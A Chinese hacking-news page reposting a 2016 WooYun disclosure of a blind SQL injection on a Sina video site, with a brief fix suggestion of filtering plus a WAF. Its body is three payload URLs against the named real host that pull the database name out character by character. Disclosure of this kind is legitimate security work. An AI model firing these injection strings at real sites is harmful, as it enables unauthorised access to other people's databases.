记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

新浪某站SQL注入

2016-06-28 19:55

code 区域
 WooYun: 土豆某站点SQL注入 

这个...看了下logo是你们的图...顺便去试了下



http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),1,1)='g' and 'x'=‘x



数据库第一位是g



http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),2,1)='t' and 'x'='x



第二位是t



http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),3,1)='v' and 'x'='x



第三位是v

漏洞证明:

code 区域
可能是土豆调用了你们的api,可能是通用?

修复方案:

过滤+waf

知识来源: www.wooyun.org/bugs/wooyun-2016-0223710

阅读:70260 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“新浪某站SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云